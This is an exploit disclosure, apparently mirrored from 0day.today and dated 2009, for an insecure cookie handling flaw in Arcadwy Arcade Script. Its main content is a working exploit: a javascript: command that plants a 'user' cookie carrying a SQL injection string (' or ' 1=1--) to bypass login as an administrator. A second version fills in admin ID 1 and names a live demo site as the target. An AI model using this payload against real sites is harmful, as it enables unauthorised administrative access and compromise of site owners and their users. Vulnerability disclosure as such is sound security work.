Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln

🗓️ 29 Mar 2009 00:00:00Reported by ZoRLuType

zdt🔗 0day.today👁 16 Views

Arcadwy Arcade Script has an insecure cookie handling vulnerability allowing for authentication bypass.

=================================================================
Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln
=================================================================


[~] Arcadwy Arcade Script (for ByPass) Insecure Cookie Handling Vulnerability 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 29.03.2009
[~] 
[~] N0T: BasImIz Sagolsun, Muhsin YazIcIoglu Ulkemiz ve Ulkumuz icin Buyuk Kayyp Allah Rahmet Eylesin :((
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: My New Target Buffer Overflow :) There is a little time xD
[~]
[~] -----------------------------------------------------------

Demo:

http://games.arcadwy.com/

Exploit:

javascript:document.cookie = "user=[admin_id],' or ' 1=1--; path=/";

Exploit for demo:

javascript:document.cookie = "user=1,' or ' 1=1--; path=/";

[~]----------------------------------------------------------------------



#  0day.today [2018-01-10]  #

29 Mar 2009 00:00Current

7.1High risk

Vulners AI Score7.1